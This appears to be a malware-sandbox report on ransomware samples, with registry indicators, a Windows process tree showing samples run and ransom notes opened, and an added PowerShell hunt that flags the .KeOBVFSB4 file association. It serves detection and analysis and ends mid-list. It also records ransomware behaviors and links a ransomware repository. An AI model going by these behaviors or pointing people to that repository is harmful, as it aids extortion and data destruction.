| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\KeOBVFSB4\DefaultIcon\ = "C:\\ProgramData\\KeOBVFSB4.ico" | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.KeOBVFSB4 | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
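The `.KeOBVFSB4` rows above are the classic ransomware file-association artifact: the sample registers its random extension under `HKLM\SOFTWARE\Classes`, points it at a ProgID of the same name, and gives that ProgID a `DefaultIcon` living in `C:\ProgramData`, a location no packaged installer normally uses for icons. The following hunt is an added example, not part of the sandbox report or of the sample's code. The function name, the list of "suspicious" icon directories and the mixed-case heuristic for random-looking extensions are assumptions chosen for illustration; the extension and icon path it would surface here are the ones recorded in the table.

```powershell
# Added example (not from the report): hunt HKLM\SOFTWARE\Classes for an
# extension -> ProgID -> DefaultIcon chain like the .KeOBVFSB4 one above.
function Find-RansomExtensionClasses {
    param(
        [string]$ClassesRoot = 'HKLM:\SOFTWARE\Classes',
        # Assumption: icons under these user-writable roots are worth a look.
        [string[]]$SuspiciousIconDirs = @('C:\ProgramData\', "$env:PUBLIC\", "$env:TEMP\")
    )

    Get-ChildItem -Path $ClassesRoot -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -like '.*' } |
        ForEach-Object {
            $ext    = $_.PSChildName
            # The extension key's (default) value names the ProgID, e.g. "KeOBVFSB4".
            $progId = (Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue).'(default)'
            if (-not $progId) { return }

            $iconKey = Join-Path $ClassesRoot "$progId\DefaultIcon"
            $icon    = (Get-ItemProperty -Path $iconKey -ErrorAction SilentlyContinue).'(default)'
            if (-not $icon) { return }

            # Strip surrounding quotes and a trailing ",<index>" to get the bare path.
            $iconPath = $icon -replace '^"?([^",]+)"?.*$', '$1'

            $flagged = $SuspiciousIconDirs | Where-Object { $iconPath -like "$_*" }

            # Heuristic (assumption): 6+ alphanumerics mixing upper and lower case
            # reads like a generated victim ID rather than a real file type.
            $randomLike = ($ext -match '^\.[A-Za-z0-9]{6,}$') -and
                          ($ext -cmatch '[a-z]') -and ($ext -cmatch '[A-Z]')

            if ($flagged -or $randomLike) {
                $reason = if ($flagged) { 'DefaultIcon in user-writable directory' }
                          else         { 'random-looking extension' }
                [pscustomobject]@{
                    Extension = $ext
                    ProgId    = $progId
                    IconPath  = $iconPath
                    IconOnDisk = Test-Path -LiteralPath $iconPath
                    Reason    = $reason
                    Key       = $_.Name
                }
            }
        }
}

# Usage: run elevated on the suspect host; on the machine this report describes
# the output row would be .KeOBVFSB4 / KeOBVFSB4 / C:\ProgramData\KeOBVFSB4.ico.
Find-RansomExtensionClasses | Format-Table -AutoSize
```

The per-user hive (`HKCU:\Software\Classes`) is worth the same pass when the sample ran without elevation; the report shows this one wrote to `HKLM`, which tells you it had administrative rights at the time.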
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\system32\fontdrvhost.exe
"fontdrvhost.exe"
C:\Windows\system32\fontdrvhost.exe
"fontdrvhost.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/Pyran1/MalwareDatabase/tree/master/Ransomware
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8215e46f8,0x7ff8215e4708,0x7ff8215e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2552 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4944 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4944 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4200 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5988 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\" -spe -an -ai#7zMap30225:190:7zEvent18008
C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe
"C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\KeOBVFSB4.README.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2268 /prefetch:2
C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe
"C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe"
C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe
"C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe"
C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe
"C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe"
C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe
"C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3112 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4844 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4184 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6268 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap11042:198:7zEvent496
C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe
"C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe"
C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe
"C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe"
C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe
"C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe
"C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe"
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\KeOBVFSB4.README.txt
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\NightSkyReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2000 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
